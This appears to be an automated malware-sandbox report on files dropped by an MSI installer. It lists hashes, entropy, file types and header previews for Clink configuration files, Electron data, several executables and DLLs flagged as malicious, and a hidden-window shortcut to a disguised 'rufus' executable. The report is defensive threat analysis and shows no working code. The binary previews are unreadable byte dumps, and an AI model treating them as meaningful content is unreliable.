                                                                                                                                                                                          MD5:E1F0F9220288BD4615B51C812FECF6BF
                                                                                                                                                                                          SHA1:C3FBE7E26CFFA1D947D2484C7DF9A98565661CBE
                                                                                                                                                                                          SHA-256:1F8ED9E3AEBF192BC194B334A88D3E04F12B1AEFB7C26E64EBB8178D0306FBDF
                                                                                                                                                                                          SHA-512:1D0F97D9E6D380B43FF06E4E1A020D2BE4606A30CCEE74F9B5E23DBD03176F6CD955AA6E668FE8C17E5BB4A3C9EB48A1220622BFE939774E479839B91915B12C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:set bell-style visible..set completion-ignore-case on..set completion-map-case on..set completion-display-width 106..set output-meta on..set skip-completed-text on..set convert-meta on...."\e`s": backward-word # ctrl-left.."\e`t": forward-word # ctrl-right.."\e`O": end-of-line # end.."\e`G": beginning-of-line # home.."\e`S": delete-char # del.."\e`c": page-up # shift page-up.."\e`u": kill-line # ctrl+end.."\e`w": backward-kill-line # ctrl+home.."\e`I": history-search-backward # page-up.."\e`Q": history-search-forward # page-down....set keymap emacs.."\t": clink-completion-shim..C-v: paste-from-clipboard..C-q: reload-lua-state..C-z: undo..M-h: show-rl-help..M-C-c: copy-line-to-clipboard..C-c: ctrl-c..M-a: "..\\"....
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):25904
                                                                                                                                                                                          Entropy (8bit):7.2101363709041735
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:mTmIPNyb8E9VF6IYinAM+oOZyByVGR2Ei/+IYigZyByVWq1/wfT3ir2WSx7bLZz+:uEpYinAMxOYBGJYigYBGs3iPmbLx+
                                                                                                                                                                                          MD5:D0A1C2BD327021EB3B7D4D64EA7DE1FA
                                                                                                                                                                                          SHA1:A2A0A47882F9918D8CE5CA60906624CDD9086EF1
                                                                                                                                                                                          SHA-256:C81CD3BC1BE1453237B267F8B63B01A7580D7E100EDFC05852A8DD0BDEA8FD6E
                                                                                                                                                                                          SHA-512:D9D7D8757DB16472D175A3711AAF06846D9C8CAAEA28F51509CE8D77C574ABA523A00FD3F94F13186A7F9D02BD057D0165096D4205B1EBD45D920CFF5E7B2300
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............Ox..Ox..Ox..:y..Ox..=y..Ox..Oy..Ox..:q..Ox..:x..Ox..:...Ox..:z..Ox.Rich.Ox.................PE..d....q.c.........."............................@.............................P......rP....`.........................................."..T...D#..<....@..@....0..........0S........... ..p............................................ ..P............................text............................... ..`.rdata....... ......................@..@.pdata.......0......................@..@.rsrc...@....@......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):25392
                                                                                                                                                                                          Entropy (8bit):7.262798670381018
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:9EpYinAMxOYBGCYmEYigYBGqL3iPmbLDM:27HxVGCY17DGqT77M
                                                                                                                                                                                          MD5:EAADD496E2AB711795F3CDB90A312456
                                                                                                                                                                                          SHA1:499FDA2A2C6E0E1825F1DCC740F0666B4A6D9EFB
                                                                                                                                                                                          SHA-256:5C1ACB13CBF6853328C80574C87DE7AD21C3D2E02B763AB99AD7B85199DA5B8C
                                                                                                                                                                                          SHA-512:3855544CA0EE76AD40FF8886E10E0527D07254E17D421F7ECB3B9A5321C1751AC1574BC0D240FCC98BF61FB1DB25B3A38AA63059EBF6A9AA72D3A011259CD031
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............Ox..Ox..Ox..:y..Ox..=y..Ox..Oy..Ox..:q..Ox..:x..Ox..:...Ox..:z..Ox.Rich.Ox.................PE..L...vq.c..................................... ....@..........................P......e.....@.......................... ..X...."..<....0..@...............0S...@..(.... ..p............................................ ..(............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):539
                                                                                                                                                                                          Entropy (8bit):4.072004224137913
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:UAV8zfBGDWK/wmxNJMS/pSklfbL87j/fBKGAv:UAezfBGVoUNP/pSkljY7jXPK
                                                                                                                                                                                          MD5:CFC0F80F23092FED002A11623066A996
                                                                                                                                                                                          SHA1:A2A4BC331418EDD1AE517EDA4D3D249CF570186E
                                                                                                                                                                                          SHA-256:981FF49A6AAB13BF86B7EE1EF21C3E49D0F24F29EA81BCE6A722C78BF8750E42
                                                                                                                                                                                          SHA-512:C84E3C8566CB3BC97EF6E16D2327F2F876F38CB29CB3565B6018C3C10E504B516C814318841D89C0E19A02C05BB8DB62A70894A99D9578327E81A4EB9AD76BB0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# When this file is named "default_inputrc" and is in the binaries..# directory or profile directory, it provides enhanced default settings.....# Override the built-in Readline defaults with ones that provide a more..# enhanced Clink experience.....colored-completion-prefix on..colored-stats on..mark-symlinked-directories on..completion-auto-query-items on..history-point-at-end-of-anchored-search on..search-ignore-case on....
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1581
                                                                                                                                                                                          Entropy (8bit):4.091082670888414
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:UAeZBGVoULqpSkl204QP6/fSh4XO6JhA395Jb3cQkQ0:ZOB9+Nks9CRb3cVh
                                                                                                                                                                                          MD5:3F594B7A0E1593AEC734C59913C50A57
                                                                                                                                                                                          SHA1:C0B250A1223DA8C6B3684E94F12FBD96E1D0A460
                                                                                                                                                                                          SHA-256:54844F91F31D513FD22F0822A7F2C48F69C1DFF936F161DA28E09E759C57AB9E
                                                                                                                                                                                          SHA-512:D5DF5AA5F8AF88A709C287994DDE744EA8482117C4505E0B4A49B64591553ED8D0EE49DD96C4DFBC6363CB8D1DE5B8A206192D462CFA9AD207D09148451D978D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# When this file is named "default_settings" and is in the binaries..# directory or profile directory, it provides enhanced default settings.....# Override built-in default settings with ones that provide a more..# enhanced Clink experience.....autosuggest.enable = True..clink.default_bindings = windows..cmd.ctrld_exits = False..color.arginfo = sgr 38;5;172..color.argmatcher = sgr 1;38;5;40..color.cmd = sgr 1;38;5;231..color.cmdredir = sgr 38;5;172..color.cmdsep = sgr 38;5;214..color.comment_row = sgr 38;5;87;48;5;18..color.description = sgr 38;5;39..color.doskey = sgr 1;38;5;75..color.executable = sgr 1;38;5;33..color.filtered = sgr 38;5;231..color.flag = sgr 38;5;117..color.hidden = sgr 38;5;160..color.histexpa
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1622832
                                                                                                                                                                                          Entropy (8bit):7.97733508112384
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:H8U9+A6KdMt7ZRuYfuv9dTWGNj0GvXFGfkRssBUEt3kRQrf7zSIBDICweAVdEY2Y:cUUvltf6SGd/FGfIsTE665h0dEY2nY
                                                                                                                                                                                          MD5:8FE64DA09AF371B02A31828415ECE8F3
                                                                                                                                                                                          SHA1:5B5C90DCD425C814B555A4567405601AA977EE0B
                                                                                                                                                                                          SHA-256:8279696C1D78B14618500E9135886A3667B9DECC65946F3729002E4BFDBB20AB
                                                                                                                                                                                          SHA-512:E49F9B1C9D33364101AD2FD4F2C5ED030700CC941BB469CF2CE7D5B32C51CAB9E62B265E05CBD92435453E7E4008C9990BEA532298676F7D81E5D6DCDC2F590B
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...=j.g...............+.........0..p!F..@.....@..............................F...........`... ...............................................F......0F.........K......0-....F..............................-F.(...................................................UPX0.....0..............................UPX1.........@......................@....rsrc........0F.....................@...4.24.UPX!.$......*B....F.D.....@.I......a..\.."...,J=.Q&*.d......8...*.[.'}.......Z....."..S...?.`.aL&..0......7..+.=..}....(Ryvt.3a........'.g.h.G.....$.=m.......p......#I.....,.J.W.......r.....,..8H...UlG<.8.l./l.H1W9C..U.....f,...CSd..u....K.}}R}.3...b%.....0..........3..."....IK.c.^...!\.@*.rw......=...j.L.W=Y$*.d....<U..d..i9...d..t.g..d..*oC...7.{.E./..e27.QL.a..L......w<.q.(..]:[w.SO.*.~.b\E...1]..I.o...8........n.B.. W..@v.n..,..J....y.o.....~.X..I..c.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):40568
                                                                                                                                                                                          Entropy (8bit):6.636568875112838
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:GiRkQ10rr/40ev7+klSHFENgf7Cef8rMYAyajUCG/zwD5mqukbnno0tDfGQ8cCq8:9k/H40eqks8r73IcvoYOyh1a2735PxYU
                                                                                                                                                                                          MD5:AB0C3CEB2AAB0D0443E5631F327123A2
                                                                                                                                                                                          SHA1:ACC4B1E6FF452384A5A8FD534FEED872859AE0E2
                                                                                                                                                                                          SHA-256:85942CB9DF0E50D273A15738D5C7B17651DD41431C78EC31C8C4CD93F63702DA
                                                                                                                                                                                          SHA-512:2A3465E795F92515EE8146DF83696E71A2777C392AE2D0DFCD5234BBAEFA6C3B299ABF19FB4836A821DC8B0FE3BE462F715E59A87D38957C30B2826529251551
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..A#..#..#..*...'......"......2......)......&..N..."..N...!..#.........$......"....h."..#..."......"..Rich#..................PE..L.....r_...........!.....8...>.......7.......P......................................X.....@A.........................^.......x..x.......H............v..x(..........@S..T............................S..@............P...............................text...Z7.......8.................. ..`.rdata..H-...P.......<..............@..@.data................j..............@....rsrc...H............l..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):306214
                                                                                                                                                                                          Entropy (8bit):4.392850925698206
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:ogusbBDoCIdRSt25iD1Z3yAcCLi9wfuwWMvDdkbMzaQ:ogus9oCM9OUYffnWYWbIF
                                                                                                                                                                                          MD5:AEDD1B80A8140B94C00DB3C0B9485772
                                                                                                                                                                                          SHA1:2DC8444E599438ED37A31EBFE7F8859AF7FAC631
                                                                                                                                                                                          SHA-256:C1DA41052ABE31791AE90A9DBE54442A641E1ECBB018EF35C44E7AED05B8F72E
                                                                                                                                                                                          SHA-512:3E06CB550F46285D8DC81D1F082732C07E9C9D81ABE931E859262C7BA699D4EB9737581F5A5C5174E09BB0FC0561A9DE46298714CED38F453F922F9536C67D0C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:...............12.2.281.27-electron.0..........................................8L..N...........$....K..a........a........a2.......ar.......a2.......aT.........."..............B..............b........."..............B........(Jb....L.....@..F^.-..1.`.....(Jb...2P.....@..F^..`.....H...IDa........Db............D`.....).D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):679161
                                                                                                                                                                                          Entropy (8bit):5.217457437935302
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:m/h8ML2Zu/Bg90Ws9oCM9Otxh6vtDINPbIgTtLAkW/cB2Z0JZkQXEzBO+lZ:myMSZu/Bg90BuCzIP/+2ZGZazJlZ
                                                                                                                                                                                          MD5:0C259ECBB12E6F3F0E076E6200221489
                                                                                                                                                                                          SHA1:3DE53DCAFDCE24C151DD1812769B46ACEA77C90C
                                                                                                                                                                                          SHA-256:83A8345EA197020E07FE2CF53E74F31D0CC632CA1537F5C9C1DB2FB2665AB04F
                                                                                                                                                                                          SHA-512:6EF39EE8B7D40C5E6C0E79F8C4E846D431A6A87711D025122E2E7F060C5754FFF917771D5EDE6ADEC3BE909FB5CE0E8EB1DF5E18142ECDB6339BDDE8CE2C8398
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........a. ..?h12.2.281.27-electron.0..................................................................$...x...a........a........a........ar.......a2.......aT.........."..............B..............b........."..............B........(Jb....L.....@..F^.-..1.`.....(Jb...2P.....@..F^..`.....H...IDa........Db............D`.....).D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5312000
                                                                                                                                                                                          Entropy (8bit):6.364538151451408
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:qL1wrvfRIQkXfBe1IlA8gE+LGHEYXb3GNfsUd9QjqZztkJCP1pSN6WxHEmp+DnnV:61w7weOqiFIYBgTE
                                                                                                                                                                                          MD5:729614A3C92DBAE65381807AD0C6FE23
                                                                                                                                                                                          SHA1:E8CB4BFC8EF2814ED6480DEB852C0FEFB8FD3913
                                                                                                                                                                                          SHA-256:B4FC8C9B14234E9FCFB93F5AA163D8FD27966114E40D76A94089DCB16E61BC8B
                                                                                                                                                                                          SHA-512:1BA93F0719561462DDA60F8A5C92F866E93CEC0740D1D6D9FF9D21623446A9F9205267275192F337745C5C947E5F732140F4AF812DDA95058B4EEF8C2A7047B8
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." .....n@...........:.......................................R...........`A.........................................sL.......L.P.....Q......0P..^............R.t~...0L.....................x/L.(...@.@.@........... .L.P............................text....m@......n@................. ..`.rdata........@......r@.............@..@.data........pM......ZM.............@....pdata...^...0P..`....N.............@..@.gxfg....-....Q......TP.............@..@.retplne......Q.......P..................tls....Y.....Q.......P.............@..._RDATA..\.....Q.......P.............@..@.rsrc.........Q.......P.............@..@.reloc..t~....R.......P.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):106
                                                                                                                                                                                          Entropy (8bit):4.724752649036734
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                                          MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                          SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                          SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                          SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):21264
                                                                                                                                                                                          Entropy (8bit):6.666169407360595
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:u0A2poIjputb2IYiBpxDA/V1VF0hXHMGBk7/UMQ3aCHb:FSEuJYi3RA/V1VaXLkjTC7
                                                                                                                                                                                          MD5:4C9F3325972DDA2AB9E4298309E47775
                                                                                                                                                                                          SHA1:A5A31F4DDD4BFF7B9842440718B0C3C6B6A67A6B
                                                                                                                                                                                          SHA-256:7F5EC1B0361D044389804D176441E6F36B5E6533AC72095A53F0FFA5AB97C991
                                                                                                                                                                                          SHA-512:1EB268B05004E6AFD52CA664E2E0CB56BC1D426813B16E07266AF8A7B8F3AFC922DAB83D1281F854DA96224CFCF609D680F128E83CFD871C5058309B05E43C4D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ok.+...+...+....z..)...y...)..."r&.(...+...5...y...!...y...!...y...*......*....J.*......*...Rich+...................PE..L......c...........!................P........ ...............................`......=N....@A................................D%..P....@...............(...+...P..<.... ..T............................!..@............ ..d............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..<....P.......&..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):149776
                                                                                                                                                                                          Entropy (8bit):6.5396839089543075
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:RMVrs97qCl+Fuydxe1nU0bv+qjwh/fk4etFAzWG3B7LEIsDLP0J:RMVrwqClLqyUev+mqg0WGRHjLJ
                                                                                                                                                                                          MD5:6F3E0AE63709A9ADD4A82341D8AABB4B
                                                                                                                                                                                          SHA1:C6370D212035E273F3E89BC75B4ED863E3104410
                                                                                                                                                                                          SHA-256:FF32FEBE7B50CA4309B5C688F043202750F2CAE8E55FE88F3731296D61EEBD3C
                                                                                                                                                                                          SHA-512:9A694736C3641A493E83F48EA4427CD833FFCA738E302E5D066567198FEE29161FC95BE36F18E55B03362161B32A7F59F43D94A7446C44A713A7C869C0F03DA6
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A(../{../{../{M..z../{..+z../{...z../{o!.z../{...{../{...z../{...{.~/{..*z../{..+z../{..,z../{M.*z../{M./z../{M..{../{M.-z../{Rich../{................PE..L......c...........!.....T...........#.......p...............................`......bW....@A............................D............ ...................+...0...!..l...T...............................@............p..`............................text....S.......T.................. ..`.rdata.......p.......X..............@..@.data...............................@....rsrc........ ......................@..@.reloc...!...0..."..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):125048
                                                                                                                                                                                          Entropy (8bit):4.074455267050186
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:gg6tcKRoEjS/ewCipkt9hjp11111111111111111111111111111111111111116:gHjqVhxYi3fPxWEp2W
                                                                                                                                                                                          MD5:C5AACCCB412A266329C6FEA32FDE0637
                                                                                                                                                                                          SHA1:2FE5F91CFB9EBEF2CEBEEC56C80E9BD3C7E37A22
                                                                                                                                                                                          SHA-256:A8A7DD19584A363CA7834EAD95E340CC95CC56FF58149D902205E583B942B240
                                                                                                                                                                                          SHA-512:18DFA9CF3CEC7705F401246CD4A12ED96C8BC4F58B3401957F25CED0E7613765FEAA4AADB0B2D47156150B4F437E3C03F66E9B11B9BB5B513FAA84279108DCA1
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................!......................................p.~....p.....Rich...........................PE..L......c...........!................@........ ............................................@A................................<%..P....@..................x(......@.... ..T............................!..@............ ..h............................text... ........................... ..`.rdata..D.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):81304
                                                                                                                                                                                          Entropy (8bit):5.919580025846384
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:G3jR7w5kUKbsUjgJewoMOA2k01ITAMLvJ5kNv42/wItn6NlzY:G3j+5kUKAmstJOZI7RSNv4Yw8WE
                                                                                                                                                                                          MD5:CFE4BCB28AEC046B3D322AEBB442C358
                                                                                                                                                                                          SHA1:53577839C5B56FB94EEF310F304EA746146F6A07
                                                                                                                                                                                          SHA-256:F19AD9DB3024F79ADC863474A1CD021686C8F75C04B0472A5BB7047D6AAB35BD
                                                                                                                                                                                          SHA-512:9BAA6D953E9E32E8874839E4754A0071F354D6045FB244CAF1753C77825FA0ED2FBE8A6B6030CE9688B904E9C234F0B7ADBFDF8062AFB960009CB9BB21348A2E
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+pb.o...o...o....a..e....a..m...=d..k...fi..f...o.......=d..g...=d..k...=d..v....d..l....d..n....d.n....d..n...Richo...................PE..d....`.c.........." .........................................................`...........`A........................................p....................0......p........%...P......H...T...............................8............................................text............................... ..`.rdata..,H.......J..................@..@.data...............................@....pdata..p...........................@..@.rsrc....0.......2..................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):954368
                                                                                                                                                                                          Entropy (8bit):6.588967390706855
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:4kMYSDIukxvnwhdzY96Z5WiDYsH56g3P0zAk7lEb:4ku0fwhC96Z5WiDYsH56g3P0zAk7l
                                                                                                                                                                                          MD5:958E05991BADA25C141FAC153EE5B685
                                                                                                                                                                                          SHA1:1EF98A7DC87AC54FE86FC24C7C47CA4F888D6B9D
                                                                                                                                                                                          SHA-256:55EDE647AC14337AE3A7107E5B5E4883B6B5D3A52944A0AFE75212E49BC31246
                                                                                                                                                                                          SHA-512:0AAD782DA9BC12149B716A5F6A875673A72E98C480F21296CB287144FD88BDD970233DD5287EA8F72AE69CDE47D8475AD4CC1A85B6FBEF56F6F82B77EF8C259A
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." ......................................................... ............`A............................................<!...3..P............ ..Xq..............(...,...........................(...@...@............8...............................text...{........................... ..`.rdata..............................@..@.data...pL......."..................@....pdata..Xq... ...r..................@..@.gxfg...P).......*...N..............@..@.retplne.............x...................tls.................z..............@..._RDATA..\............|..............@..@.rsrc................~..............@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):101496
                                                                                                                                                                                          Entropy (8bit):6.718527877323426
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:a3T36oNDAYOpRQNjwlG/pXV5785DDKBOxj:a3T3JEYOjLlG/pXVZ8N
                                                                                                                                                                                          MD5:76D01D5CFCA8BC565C0ABC8B1B0ED9D2
                                                                                                                                                                                          SHA1:22BF364D5495CEAE0EE4421C813C00732886E0B0
                                                                                                                                                                                          SHA-256:30E559EF9D1DF6EBB7452AD8A24044100FCDB8F96C25905AF72962D4FA93B82F
                                                                                                                                                                                          SHA-512:393B75E5D6D219BBCB7DDED8B2F12B1C0CFDB7FDD4164EE244C9044E68F16ADEDB0F61142929FFB58CA6E4EED223E3DEC80473081E3EC57AC47A8698A71E0E9A
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Hjn..............s......ns......Gs..........=...ns......ns......ns......ns......mq......mq......mq......mq......Rich............PE..d...-`.c.........." ... ......................LZ..........................................`A.........................................Q.......Y...............p.......d..x(......|....@..p...........................P?..@...............x............................text............................... ..`.rdata..@o.......p..................@..@.data...8....`.......P..............@....pdata.......p.......R..............@..@.rsrc................^..............@..@.reloc..|............b..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Sat Mar 8 06:57:16 2025, mtime=Tue Mar 25 19:01:55 2025, atime=Sat Mar 8 06:57:16 2025, length=1622832, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2154
                                                                                                                                                                                          Entropy (8bit):3.9252803156586102
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:8qfs8AZREjKjqbdt9p+SlEd6n8AU1sWlvk6OwwblnacPcdu1bH6OwwblnacP3vJr:8qx1jKjqbdt99auq85BaJdu1bH5BaIM
                                                                                                                                                                                          MD5:72943C56D240DFE0A310319A6B6497E0
                                                                                                                                                                                          SHA1:71B1C1592FCD9485D594552827D71B6FEB724007
                                                                                                                                                                                          SHA-256:1D161578CE490EF98C374A0268A0207A39194B32AF136403BFD2012A1DA1752F
                                                                                                                                                                                          SHA-512:18A9C16C7167F4A03BBB4312CBD272B059F4BE885F49EE9C7082C892B1BF8EE5532C69D3D595AFD1A7F0843B03FCEAAA5717194DBE32CDE76C86CB0FC5C0F8AD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:L..................F.@.. .....`...............`.....0.......................H.:..DG..Yr?.D..U..k0.&...&...... M.............w~.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlyZ6.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....yZ:...Roaming.@......DWSlyZ:.....C......................:.R.o.a.m.i.n.g.....\.1.....yZ:...TASOVC~1..D......yZ:.yZ:............................:.T.a.s.o.v.C.o.o.p.....n.1.....yZ<...KLIOVE~1..V......yZ:.yZ<.....X......................Y.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.....j.2.0...hZ(? .RUFUS-~1.EXE..N......hZ(?yZ<.....nC........................r.u.f.u.s.-.4...6.p...e.x.e.......z...............-.......y..............e.....C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exe......\.r.u.f.u.s.-.4...6.p...e.x.e.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.a.s.o.v.C.o.o.p.\.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.\.h.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.
